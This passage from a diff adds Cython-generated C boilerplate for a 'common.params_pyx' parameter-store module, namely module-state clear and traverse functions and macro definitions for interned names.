Py_CLEAR(clear_module_state->__pyx_n_s_pyx_result); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_state); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_type); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_unpickle___Pyx_EnumMeta); + Py_CLEAR(clear_module_state->__pyx_n_s_qualname); + Py_CLEAR(clear_module_state->__pyx_n_s_r); + Py_CLEAR(clear_module_state->__pyx_n_s_range); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_reduce_ex); + Py_CLEAR(clear_module_state->__pyx_n_s_remove); + Py_CLEAR(clear_module_state->__pyx_n_s_repr); + Py_CLEAR(clear_module_state->__pyx_n_s_res); + Py_CLEAR(clear_module_state->__pyx_kp_s_s_s); + Py_CLEAR(clear_module_state->__pyx_kp_s_s_s_d); + Py_CLEAR(clear_module_state->__pyx_n_s_self); + Py_CLEAR(clear_module_state->__pyx_n_s_set_name); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate); + Py_CLEAR(clear_module_state->__pyx_n_s_setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_spec); + Py_CLEAR(clear_module_state->__pyx_n_s_start); + Py_CLEAR(clear_module_state->__pyx_n_s_state); + Py_CLEAR(clear_module_state->__pyx_n_s_str); + Py_CLEAR(clear_module_state->__pyx_kp_s_stringsource); + Py_CLEAR(clear_module_state->__pyx_n_s_super); + Py_CLEAR(clear_module_state->__pyx_n_s_target); + Py_CLEAR(clear_module_state->__pyx_n_s_test); + Py_CLEAR(clear_module_state->__pyx_n_s_threading); + Py_CLEAR(clear_module_state->__pyx_n_s_tx_type); + Py_CLEAR(clear_module_state->__pyx_n_s_update); + Py_CLEAR(clear_module_state->__pyx_n_s_use_setstate); + Py_CLEAR(clear_module_state->__pyx_n_s_v); + Py_CLEAR(clear_module_state->__pyx_n_s_val); + Py_CLEAR(clear_module_state->__pyx_n_s_value); + Py_CLEAR(clear_module_state->__pyx_n_s_values); + Py_CLEAR(clear_module_state->__pyx_int_222419149); + Py_CLEAR(clear_module_state->__pyx_int_228825662); + Py_CLEAR(clear_module_state->__pyx_int_238750788); + Py_CLEAR(clear_module_state->__pyx_k__4); + Py_CLEAR(clear_module_state->__pyx_tuple__2); + Py_CLEAR(clear_module_state->__pyx_tuple__5); + Py_CLEAR(clear_module_state->__pyx_tuple__7); + Py_CLEAR(clear_module_state->__pyx_tuple__9); + Py_CLEAR(clear_module_state->__pyx_tuple__11); + Py_CLEAR(clear_module_state->__pyx_tuple__12); + Py_CLEAR(clear_module_state->__pyx_tuple__16); + Py_CLEAR(clear_module_state->__pyx_tuple__19); + Py_CLEAR(clear_module_state->__pyx_tuple__22); + Py_CLEAR(clear_module_state->__pyx_tuple__24); + Py_CLEAR(clear_module_state->__pyx_tuple__26); + Py_CLEAR(clear_module_state->__pyx_tuple__28); + Py_CLEAR(clear_module_state->__pyx_tuple__30); + Py_CLEAR(clear_module_state->__pyx_tuple__31); + Py_CLEAR(clear_module_state->__pyx_tuple__33); + Py_CLEAR(clear_module_state->__pyx_tuple__34); + Py_CLEAR(clear_module_state->__pyx_tuple__36); + Py_CLEAR(clear_module_state->__pyx_tuple__38); + Py_CLEAR(clear_module_state->__pyx_tuple__40); + Py_CLEAR(clear_module_state->__pyx_tuple__42); + Py_CLEAR(clear_module_state->__pyx_tuple__46); + Py_CLEAR(clear_module_state->__pyx_tuple__48); + Py_CLEAR(clear_module_state->__pyx_tuple__50); + Py_CLEAR(clear_module_state->__pyx_codeobj__6); + Py_CLEAR(clear_module_state->__pyx_codeobj__8); + Py_CLEAR(clear_module_state->__pyx_codeobj__10); + Py_CLEAR(clear_module_state->__pyx_codeobj__13); + Py_CLEAR(clear_module_state->__pyx_codeobj__14); + Py_CLEAR(clear_module_state->__pyx_codeobj__15); + Py_CLEAR(clear_module_state->__pyx_codeobj__17); + Py_CLEAR(clear_module_state->__pyx_codeobj__18); + Py_CLEAR(clear_module_state->__pyx_codeobj__20); + Py_CLEAR(clear_module_state->__pyx_codeobj__23); + Py_CLEAR(clear_module_state->__pyx_codeobj__25); + Py_CLEAR(clear_module_state->__pyx_codeobj__27); + Py_CLEAR(clear_module_state->__pyx_codeobj__29); + Py_CLEAR(clear_module_state->__pyx_codeobj__32); + Py_CLEAR(clear_module_state->__pyx_codeobj__35); + Py_CLEAR(clear_module_state->__pyx_codeobj__37); + Py_CLEAR(clear_module_state->__pyx_codeobj__39); + Py_CLEAR(clear_module_state->__pyx_codeobj__41); + Py_CLEAR(clear_module_state->__pyx_codeobj__43); + Py_CLEAR(clear_module_state->__pyx_codeobj__44); + Py_CLEAR(clear_module_state->__pyx_codeobj__45); + Py_CLEAR(clear_module_state->__pyx_codeobj__47); + Py_CLEAR(clear_module_state->__pyx_codeobj__49); + return 0; +} +#endif +/* #### Code section: module_state_traverse ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_traverse(PyObject *m, visitproc visit, void *arg) { + __pyx_mstate *traverse_module_state = __pyx_mstate(m); + if (!traverse_module_state) return 0; + Py_VISIT(traverse_module_state->__pyx_d); + Py_VISIT(traverse_module_state->__pyx_b); + Py_VISIT(traverse_module_state->__pyx_cython_runtime); + Py_VISIT(traverse_module_state->__pyx_empty_tuple); + Py_VISIT(traverse_module_state->__pyx_empty_bytes); + Py_VISIT(traverse_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_VISIT(traverse_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_VISIT(traverse_module_state->__pyx_FusedFunctionType); + #endif + Py_VISIT(traverse_module_state->__pyx_ptype_6common_10params_pyx_Params); + Py_VISIT(traverse_module_state->__pyx_type_6common_10params_pyx_Params); + Py_VISIT(traverse_module_state->__pyx_ptype_6common_10params_pyx___pyx_scope_struct__put_nonblocking); + Py_VISIT(traverse_module_state->__pyx_type_6common_10params_pyx___pyx_scope_struct__put_nonblocking); + Py_VISIT(traverse_module_state->__pyx_ptype_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking); + Py_VISIT(traverse_module_state->__pyx_type_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking); + Py_VISIT(traverse_module_state->__pyx_ptype___Pyx_EnumMeta); + Py_VISIT(traverse_module_state->__Pyx_EnumMeta); + Py_VISIT(traverse_module_state->__pyx_kp_s_); + Py_VISIT(traverse_module_state->__pyx_kp_u_); + Py_VISIT(traverse_module_state->__pyx_n_s_ALL); + Py_VISIT(traverse_module_state->__pyx_n_s_CLEAR_ON_MANAGER_START); + Py_VISIT(traverse_module_state->__pyx_n_s_CLEAR_ON_OFFROAD_TRANSITION); + Py_VISIT(traverse_module_state->__pyx_n_s_CLEAR_ON_ONROAD_TRANSITION); + Py_VISIT(traverse_module_state->__pyx_n_s_EnumBase); + Py_VISIT(traverse_module_state->__pyx_n_s_EnumType); + Py_VISIT(traverse_module_state->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0); + Py_VISIT(traverse_module_state->__pyx_n_s_IntEnum); + Py_VISIT(traverse_module_state->__pyx_n_s_IntFlag); + Py_VISIT(traverse_module_state->__pyx_n_s_KeyboardInterrupt); + Py_VISIT(traverse_module_state->__pyx_n_s_MemoryError); + Py_VISIT(traverse_module_state->__pyx_n_s_OrderedDict); + Py_VISIT(traverse_module_state->__pyx_n_s_PERSISTENT); + Py_VISIT(traverse_module_state->__pyx_n_s_ParamKeyType); + Py_VISIT(traverse_module_state->__pyx_n_s_Params); + Py_VISIT(traverse_module_state->__pyx_n_s_Params___reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_Params___setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_Params_all_keys); + Py_VISIT(traverse_module_state->__pyx_n_s_Params_check_key); + Py_VISIT(traverse_module_state->__pyx_n_s_Params_clear_all); + Py_VISIT(traverse_module_state->__pyx_n_s_Params_get); + Py_VISIT(traverse_module_state->__pyx_n_s_Params_get_bool); + Py_VISIT(traverse_module_state->__pyx_n_s_Params_get_param_path); + Py_VISIT(traverse_module_state->__pyx_n_s_Params_put); + Py_VISIT(traverse_module_state->__pyx_n_s_Params_put_bool); + Py_VISIT(traverse_module_state->__pyx_n_s_Params_remove); + Py_VISIT(traverse_module_state->__pyx_n_s_PickleError); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_EnumBase); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_EnumBase___new); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_EnumBase___repr); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_EnumBase___str); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_EnumMeta___reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_EnumMeta___setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_FlagBase); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_FlagBase___new); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_FlagBase___repr); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_FlagBase___str); + Py_VISIT(traverse_module_state->__pyx_n_s_Thread); + Py_VISIT(traverse_module_state->__pyx_n_s_TypeError); + Py_VISIT(traverse_module_state->__pyx_n_s_UnknownKeyName); + Py_VISIT(traverse_module_state->__pyx_kp_s_Unknown_enum_value_s); + Py_VISIT(traverse_module_state->__pyx_n_s_ValueError); + Py_VISIT(traverse_module_state->__pyx_n_s__21); + Py_VISIT(traverse_module_state->__pyx_kp_u__3); + Py_VISIT(traverse_module_state->__pyx_n_s__51); + Py_VISIT(traverse_module_state->__pyx_n_s_all_keys); + Py_VISIT(traverse_module_state->__pyx_n_s_asyncio_coroutines); + Py_VISIT(traverse_module_state->__pyx_n_s_block); + Py_VISIT(traverse_module_state->__pyx_n_s_check_key); + Py_VISIT(traverse_module_state->__pyx_n_s_class); + Py_VISIT(traverse_module_state->__pyx_n_s_class_getitem); + Py_VISIT(traverse_module_state->__pyx_n_s_clear_all); + Py_VISIT(traverse_module_state->__pyx_n_s_cline_in_traceback); + Py_VISIT(traverse_module_state->__pyx_n_s_cls); + Py_VISIT(traverse_module_state->__pyx_n_s_collections); + Py_VISIT(traverse_module_state->__pyx_n_s_common_params_pyx); + Py_VISIT(traverse_module_state->__pyx_kp_s_common_params_pyx_pyx); + Py_VISIT(traverse_module_state->__pyx_n_s_d); + Py_VISIT(traverse_module_state->__pyx_n_s_dat); + Py_VISIT(traverse_module_state->__pyx_n_s_dat_bytes); + Py_VISIT(traverse_module_state->__pyx_n_s_dct); + Py_VISIT(traverse_module_state->__pyx_n_s_decode); + Py_VISIT(traverse_module_state->__pyx_n_s_dict); + Py_VISIT(traverse_module_state->__pyx_n_s_dict_2); + Py_VISIT(traverse_module_state->__pyx_kp_u_disable); + Py_VISIT(traverse_module_state->__pyx_n_s_doc); + Py_VISIT(traverse_module_state->__pyx_kp_u_enable); + Py_VISIT(traverse_module_state->__pyx_n_s_encode); + Py_VISIT(traverse_module_state->__pyx_n_s_encoding); + Py_VISIT(traverse_module_state->__pyx_n_s_ensure_bytes); + Py_VISIT(traverse_module_state->__pyx_n_s_enum); + Py_VISIT(traverse_module_state->__pyx_kp_u_gc); + Py_VISIT(traverse_module_state->__pyx_n_s_get); + Py_VISIT(traverse_module_state->__pyx_n_s_get_bool); + Py_VISIT(traverse_module_state->__pyx_n_s_get_param_path); + Py_VISIT(traverse_module_state->__pyx_n_s_getstate); + Py_VISIT(traverse_module_state->__pyx_n_s_import); + Py_VISIT(traverse_module_state->__pyx_n_s_init); + Py_VISIT(traverse_module_state->__pyx_n_s_init_subclass); + Py_VISIT(traverse_module_state->__pyx_n_s_initializing); + Py_VISIT(traverse_module_state->__pyx_n_s_is_coroutine); + Py_VISIT(traverse_module_state->__pyx_kp_u_isenabled); + Py_VISIT(traverse_module_state->__pyx_n_s_k); + Py_VISIT(traverse_module_state->__pyx_n_s_key); + Py_VISIT(traverse_module_state->__pyx_n_s_key_bytes); + Py_VISIT(traverse_module_state->__pyx_n_s_main); + Py_VISIT(traverse_module_state->__pyx_n_s_member_names); + Py_VISIT(traverse_module_state->__pyx_n_s_members); + Py_VISIT(traverse_module_state->__pyx_n_s_metaclass); + Py_VISIT(traverse_module_state->__pyx_n_s_module); + Py_VISIT(traverse_module_state->__pyx_n_s_module_2); + Py_VISIT(traverse_module_state->__pyx_n_s_mro_entries); + Py_VISIT(traverse_module_state->__pyx_n_s_name); + Py_VISIT(traverse_module_state->__pyx_n_s_name_2); + Py_VISIT(traverse_module_state->__pyx_n_s_new); + Py_VISIT(traverse_module_state->__pyx_kp_s_no_default___reduce___due_to_non); + Py_VISIT(traverse_module_state->__pyx_n_s_parents); + Py_VISIT(traverse_module_state->__pyx_n_s_pickle); + Py_VISIT(traverse_module_state->__pyx_n_s_prepare); + Py_VISIT(traverse_module_state->__pyx_n_s_put); + Py_VISIT(traverse_module_state->__pyx_n_s_put_bool); + Py_VISIT(traverse_module_state->__pyx_n_s_put_bool_nonblocking); + Py_VISIT(traverse_module_state->__pyx_n_s_put_bool_nonblocking_locals_lamb); + Py_VISIT(traverse_module_state->__pyx_n_s_put_nonblocking); + Py_VISIT(traverse_module_state->__pyx_n_s_put_nonblocking_locals_lambda); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_PickleError); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_checksum); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_result); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_state); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_type); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_unpickle___Pyx_EnumMeta); + Py_VISIT(traverse_module_state->__pyx_n_s_qualname); + Py_VISIT(traverse_module_state->__pyx_n_s_r); + Py_VISIT(traverse_module_state->__pyx_n_s_range); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_ex); + Py_VISIT(traverse_module_state->__pyx_n_s_remove); + Py_VISIT(traverse_module_state->__pyx_n_s_repr); + Py_VISIT(traverse_module_state->__pyx_n_s_res); + Py_VISIT(traverse_module_state->__pyx_kp_s_s_s); + Py_VISIT(traverse_module_state->__pyx_kp_s_s_s_d); + Py_VISIT(traverse_module_state->__pyx_n_s_self); + Py_VISIT(traverse_module_state->__pyx_n_s_set_name); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_spec); + Py_VISIT(traverse_module_state->__pyx_n_s_start); + Py_VISIT(traverse_module_state->__pyx_n_s_state); + Py_VISIT(traverse_module_state->__pyx_n_s_str); + Py_VISIT(traverse_module_state->__pyx_kp_s_stringsource); + Py_VISIT(traverse_module_state->__pyx_n_s_super); + Py_VISIT(traverse_module_state->__pyx_n_s_target); + Py_VISIT(traverse_module_state->__pyx_n_s_test); + Py_VISIT(traverse_module_state->__pyx_n_s_threading); + Py_VISIT(traverse_module_state->__pyx_n_s_tx_type); + Py_VISIT(traverse_module_state->__pyx_n_s_update); + Py_VISIT(traverse_module_state->__pyx_n_s_use_setstate); + Py_VISIT(traverse_module_state->__pyx_n_s_v); + Py_VISIT(traverse_module_state->__pyx_n_s_val); + Py_VISIT(traverse_module_state->__pyx_n_s_value); + Py_VISIT(traverse_module_state->__pyx_n_s_values); + Py_VISIT(traverse_module_state->__pyx_int_222419149); + Py_VISIT(traverse_module_state->__pyx_int_228825662); + Py_VISIT(traverse_module_state->__pyx_int_238750788); + Py_VISIT(traverse_module_state->__pyx_k__4); + Py_VISIT(traverse_module_state->__pyx_tuple__2); + Py_VISIT(traverse_module_state->__pyx_tuple__5); + Py_VISIT(traverse_module_state->__pyx_tuple__7); + Py_VISIT(traverse_module_state->__pyx_tuple__9); + Py_VISIT(traverse_module_state->__pyx_tuple__11); + Py_VISIT(traverse_module_state->__pyx_tuple__12); + Py_VISIT(traverse_module_state->__pyx_tuple__16); + Py_VISIT(traverse_module_state->__pyx_tuple__19); + Py_VISIT(traverse_module_state->__pyx_tuple__22); + Py_VISIT(traverse_module_state->__pyx_tuple__24); + Py_VISIT(traverse_module_state->__pyx_tuple__26); + Py_VISIT(traverse_module_state->__pyx_tuple__28); + Py_VISIT(traverse_module_state->__pyx_tuple__30); + Py_VISIT(traverse_module_state->__pyx_tuple__31); + Py_VISIT(traverse_module_state->__pyx_tuple__33); + Py_VISIT(traverse_module_state->__pyx_tuple__34); + Py_VISIT(traverse_module_state->__pyx_tuple__36); + Py_VISIT(traverse_module_state->__pyx_tuple__38); + Py_VISIT(traverse_module_state->__pyx_tuple__40); + Py_VISIT(traverse_module_state->__pyx_tuple__42); + Py_VISIT(traverse_module_state->__pyx_tuple__46); + Py_VISIT(traverse_module_state->__pyx_tuple__48); + Py_VISIT(traverse_module_state->__pyx_tuple__50); + Py_VISIT(traverse_module_state->__pyx_codeobj__6); + Py_VISIT(traverse_module_state->__pyx_codeobj__8); + Py_VISIT(traverse_module_state->__pyx_codeobj__10); + Py_VISIT(traverse_module_state->__pyx_codeobj__13); + Py_VISIT(traverse_module_state->__pyx_codeobj__14); + Py_VISIT(traverse_module_state->__pyx_codeobj__15); + Py_VISIT(traverse_module_state->__pyx_codeobj__17); + Py_VISIT(traverse_module_state->__pyx_codeobj__18); + Py_VISIT(traverse_module_state->__pyx_codeobj__20); + Py_VISIT(traverse_module_state->__pyx_codeobj__23); + Py_VISIT(traverse_module_state->__pyx_codeobj__25); + Py_VISIT(traverse_module_state->__pyx_codeobj__27); + Py_VISIT(traverse_module_state->__pyx_codeobj__29); + Py_VISIT(traverse_module_state->__pyx_codeobj__32); + Py_VISIT(traverse_module_state->__pyx_codeobj__35); + Py_VISIT(traverse_module_state->__pyx_codeobj__37); + Py_VISIT(traverse_module_state->__pyx_codeobj__39); + Py_VISIT(traverse_module_state->__pyx_codeobj__41); + Py_VISIT(traverse_module_state->__pyx_codeobj__43); + Py_VISIT(traverse_module_state->__pyx_codeobj__44); + Py_VISIT(traverse_module_state->__pyx_codeobj__45); + Py_VISIT(traverse_module_state->__pyx_codeobj__47); + Py_VISIT(traverse_module_state->__pyx_codeobj__49); + return 0; +} +#endif +/* #### Code section: module_state_defines ### */ +#define __pyx_d __pyx_mstate_global->__pyx_d +#define __pyx_b __pyx_mstate_global->__pyx_b +#define __pyx_cython_runtime __pyx_mstate_global->__pyx_cython_runtime +#define __pyx_empty_tuple __pyx_mstate_global->__pyx_empty_tuple +#define __pyx_empty_bytes __pyx_mstate_global->__pyx_empty_bytes +#define __pyx_empty_unicode __pyx_mstate_global->__pyx_empty_unicode +#ifdef __Pyx_CyFunction_USED +#define __pyx_CyFunctionType __pyx_mstate_global->__pyx_CyFunctionType +#endif +#ifdef __Pyx_FusedFunction_USED +#define __pyx_FusedFunctionType __pyx_mstate_global->__pyx_FusedFunctionType +#endif +#ifdef __Pyx_Generator_USED +#define __pyx_GeneratorType __pyx_mstate_global->__pyx_GeneratorType +#endif +#ifdef __Pyx_IterableCoroutine_USED +#define __pyx_IterableCoroutineType __pyx_mstate_global->__pyx_IterableCoroutineType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineAwaitType __pyx_mstate_global->__pyx_CoroutineAwaitType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineType __pyx_mstate_global->__pyx_CoroutineType +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#define __pyx_type_6common_10params_pyx_Params __pyx_mstate_global->__pyx_type_6common_10params_pyx_Params +#define __pyx_type_6common_10params_pyx___pyx_scope_struct__put_nonblocking __pyx_mstate_global->__pyx_type_6common_10params_pyx___pyx_scope_struct__put_nonblocking +#define __pyx_type_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking __pyx_mstate_global->__pyx_type_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking +#define __Pyx_EnumMeta __pyx_mstate_global->__Pyx_EnumMeta +#endif +#define __pyx_ptype_6common_10params_pyx_Params __pyx_mstate_global->__pyx_ptype_6common_10params_pyx_Params +#define __pyx_ptype_6common_10params_pyx___pyx_scope_struct__put_nonblocking __pyx_mstate_global->__pyx_ptype_6common_10params_pyx___pyx_scope_struct__put_nonblocking +#define __pyx_ptype_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking __pyx_mstate_global->__pyx_ptype_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking +#define __pyx_ptype___Pyx_EnumMeta __pyx_mstate_global->__pyx_ptype___Pyx_EnumMeta +#define __pyx_kp_s_ __pyx_mstate_global->__pyx_kp_s_ +#define __pyx_kp_u_ __pyx_mstate_global->__pyx_kp_u_ +#define __pyx_n_s_ALL __pyx_mstate_global->__pyx_n_s_ALL +#define __pyx_n_s_CLEAR_ON_MANAGER_START __pyx_mstate_global->__pyx_n_s_CLEAR_ON_MANAGER_START +#define __pyx_n_s_CLEAR_ON_OFFROAD_TRANSITION __pyx_mstate_global->__pyx_n_s_CLEAR_ON_OFFROAD_TRANSITION +#define __pyx_n_s_CLEAR_ON_ONROAD_TRANSITION __pyx_mstate_global->__pyx_n_s_CLEAR_ON_ONROAD_TRANSITION +#define __pyx_n_s_EnumBase __pyx_mstate_global->__pyx_n_s_EnumBase +#define __pyx_n_s_EnumType __pyx_mstate_global->__pyx_n_s_EnumType +#define __pyx_kp_s_Incompatible_checksums_0x_x_vs_0 __pyx_mstate_global->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0 +#define __pyx_n_s_IntEnum __pyx_mstate_global->__pyx_n_s_IntEnum +#define __pyx_n_s_IntFlag __pyx_mstate_global->__pyx_n_s_IntFlag +#define __pyx_n_s_KeyboardInterrupt __pyx_mstate_global->__pyx_n_s_KeyboardInterrupt +#define __pyx_n_s_MemoryError __pyx_mstate_global->__pyx_n_s_MemoryError +#define __pyx_n_s_OrderedDict __pyx_mstate_global->__pyx_n_s_OrderedDict +#define __pyx_n_s_PERSISTENT __pyx_mstate_global->__pyx_n_s_PERSISTENT +#define __pyx_n_s_ParamKeyType __pyx_mstate_global->__pyx_n_s_ParamKeyType +#define __pyx_n_s_Params __pyx_mstate_global->__pyx_n_s_Params +#define __pyx_n_s_Params___reduce_cython __pyx_mstate_global->__pyx_n_s_Params___reduce_cython +#define __pyx_n_s_Params___setstate_cython __pyx_mstate_global->__pyx_n_s_Params___setstate_cython +#define __pyx_n_s_Params_all_keys __pyx_mstate_global->__pyx_n_s_Params_all_keys +#define __pyx_n_s_Params_check_key __pyx_mstate_global->__pyx_n_s_Params_check_key +#define __pyx_n_s_Params_clear_all __pyx_mstate_global->__pyx_n_s_Params_clear_all +#define __pyx_n_s_Params_get __pyx_mstate_global->__pyx_n_s_Params_get +#define __pyx_n_s_Params_get_bool __pyx_mstate_global->__pyx_n_s_Params_get_bool +#define __pyx_n_s_Params_get_param_path __pyx_mstate_global->__pyx_n_s_Params_get_param_path +#define __pyx_n_s_Params_put __pyx_mstate_global->__pyx_n_s_Params_put +#define __pyx_n_s_Params_put_bool __pyx_mstate_global->__pyx_n_s_Params_put_bool +#define __pyx_n_s_Params_remove __pyx_mstate_global->__pyx_n_s_Params_remove +#define __pyx_n_s_PickleError __pyx_mstate_global->__pyx_n_s_PickleError +#define __pyx_n_s_Pyx_EnumBase __pyx_mstate_global->__pyx_n_s_Pyx_EnumBase +#define __pyx_n_s_Pyx_EnumBase___new __pyx_mstate_global->__pyx_n_s_Pyx_EnumBase___new +#define __pyx_n_s_Pyx_EnumBase___repr __pyx_mstate_global->__pyx_n_s_Pyx_EnumBase___repr +#define __pyx_n_s_Pyx_EnumBase___str __pyx_mstate_global->__pyx_n_s_Pyx_EnumBase___str +#define __pyx_n_s_Pyx_EnumMeta___reduce_cython __pyx_mstate_global->__pyx_n_s_Pyx_EnumMeta___reduce_cython +#define __pyx_n_s_Pyx_EnumMeta___setstate_cython __pyx_mstate_global->__pyx_n_s_Pyx_EnumMeta___setstate_cython +#define __pyx_n_s_Pyx_FlagBase __pyx_mstate_global->__pyx_n_s_Pyx_FlagBase +#define __pyx_n_s_Pyx_FlagBase___new __pyx_mstate_global->__pyx_n_s_Pyx_FlagBase___new +#define __pyx_n_s_Pyx_FlagBase___repr __pyx_mstate_global->__pyx_n_s_Pyx_FlagBase___repr +#define __pyx_n_s_Pyx_FlagBase___str __pyx_mstate_global->__pyx_n_s_Pyx_FlagBase___str +#define __pyx_n_s_Thread __pyx_mstate_global->__pyx_n_s_Thread +#define __pyx_n_s_TypeError __pyx_mstate_global->__pyx_n_s_TypeError +#define __pyx_n_s_UnknownKeyName __pyx_mstate_global->__pyx_n_s_UnknownKeyName +#define __pyx_kp_s_Unknown_enum_value_s __pyx_mstate_global->__pyx_kp_s_Unknown_enum_value_s +#define __pyx_n_s_ValueError __pyx_mstate_global->__pyx_n_s_ValueError +#define __pyx_n_s__21 __pyx_mstate_global->__pyx_n_s__21 +#define __pyx_kp_u__3 __pyx_mstate_global->__pyx_kp_u__3 +#define __pyx_n_s__51 __pyx_mstate_global->__pyx_n_s__51 +#define __pyx_n_s_all_keys __pyx_mstate_global->__pyx_n_s_all_keys +#define __pyx_n_s_asyncio_coroutines __pyx_mstate_global->__pyx_n_s_asyncio_coroutines +#define __pyx_n_s_block __pyx_mstate_global->__pyx_n_s_block +#define __pyx_n_s_check_key __pyx_mstate_global->__pyx_n_s_check_key +#define __pyx_n_s_class __pyx_mstate_global->__pyx_n_s_class +#define __pyx_n_s_class_getitem __pyx_mstate_global->__pyx_n_s_class_getitem +#define __pyx_n_s_clear_all __pyx_mstate_global->__pyx_n_s_clear_all +#define __pyx_n_s_cline_in_traceback __pyx_mstate_global->__pyx_n_s_cline_in_traceback +#define __pyx_n_s_cls __pyx_mstate_global->__pyx_n_s_cls +#define __pyx_n_s_collections __pyx_mstate_global->__pyx_n_s_collections +#define __pyx_n_s_common_params_pyx __pyx_mstate_global->__pyx_n_s_common_params_pyx +#define __pyx_kp_s_common_params_pyx_pyx __pyx_mstate_global->__pyx_kp_s_common_params_pyx_pyx +#define __pyx_n_s_d __pyx_mstate_global->__pyx_n_s_d +#define __pyx_n_s_dat __pyx_mstate_global->__pyx_n_s_dat +#define __pyx_n_s_dat_bytes __pyx_mstate_global->__pyx_n_s_dat_bytes +#define __pyx_n_s_dct __pyx_mstate_global->__pyx_n_s_dct +#define __pyx_n_s_decode __pyx_mstate_global->__pyx_n_s_decode +#define __pyx_n_s_dict __pyx_mstate_global->__pyx_n_s_dict +#define __pyx_n_s_dict_2 __pyx_mstate_global->__pyx_n_s_dict_2 +#define __pyx_kp_u_disable __pyx_mstate_global->__pyx_kp_u_disable +#define __pyx_n_s_doc __pyx_mstate_global->__pyx_n_s_doc +#define __pyx_kp_u_enable __pyx_mstate_global->__pyx_kp_u_enable +#define __pyx_n_s_encode __pyx_mstate_global->__pyx_n_s_encode +#define __pyx_n_s_encoding __pyx_mstate_global->__pyx_n_s_encoding +#define __pyx_n_s_ensure_bytes __pyx_mstate_global->__pyx_n_s_ensure_bytes +#define __pyx_n_s_enum __pyx_mstate_global->__pyx_n_s_enum +#define __pyx_kp_u_gc __pyx_mstate_global->__pyx_kp_u_gc +#define __pyx_n_s_get __pyx_mstate_global->__pyx_n_s_get +#define __pyx_n_s_get_bool __pyx_mstate_global->__pyx_n_s_get_bool +#define __pyx_n_s_get_param_path __pyx_mstate_global->__pyx_n_s_get_param_path +#define __pyx_n_s_getstate __pyx_mstate_global->__pyx_n_s_getstate +#define __pyx_n_s_import __pyx_mstate_global->__pyx_n_s_import +#define __pyx_n_s_init __pyx_mstate_global->__pyx_n_s_init +#define __pyx_n_s_init_subclass __pyx_mstate_global->__pyx_n_s_init_subclass +#define __pyx_n_s_initializing __pyx_mstate_global->__pyx_n_s_initializing +#define __pyx_n_s_is_coroutine __pyx_mstate_global->__pyx_n_s_is_coroutine +#define __pyx_kp_u_isenabled __pyx_mstate_global->__pyx_kp_u_isenabled +#define __pyx_n_s_k __pyx_mstate_global->__pyx_n_s_k +#define __pyx_n_s_key __pyx_mstate_global->__pyx_n_s_key +#define __pyx_n_s_key_bytes __pyx_mstate_global->__pyx_n_s_key_bytes +#define __pyx_n_s_main __pyx_mstate_global->__pyx_n_s_main +#define __pyx_n_s_member_names __pyx_mstate_global->__pyx_n_s_member_names +#define __pyx_n_s_members __pyx_mstate_global->__pyx_n_s_members +#define __pyx_n_s_metaclass __pyx_mstate_global->__pyx_n_s_metaclass +#define __pyx_n_s_module __pyx_mstate_global->__pyx_n_s_module +#define __pyx_n_s_module_2 __pyx_mstate_global->__pyx_n_s_module_2 +#define __pyx_n_s_mro_entries __pyx_mstate_global->__pyx_n_s_mro_entries +#define __pyx_n_s_name __pyx_mstate_global->__pyx_n_s_name +#define __pyx_n_s_name_2 __pyx_mstate_global->__pyx_n_s_name_2 +#define __pyx_n_s_new __pyx_mstate_global->__pyx_n_s_new +#define __pyx_kp_s_no_default___reduce___due_to_non __pyx_mstate_global->__pyx_kp_s_no_default___reduce___due_to_non +#define __pyx_n_s_parents __pyx_mstate_global->__pyx_n_s_parents +#define __pyx_n_s_pickle __pyx_mstate_global->__pyx_n_s_pickle +#define __pyx_n_s_prepare __pyx_mstate_global->__pyx_n_s_prepare +#define __pyx_n_s_put 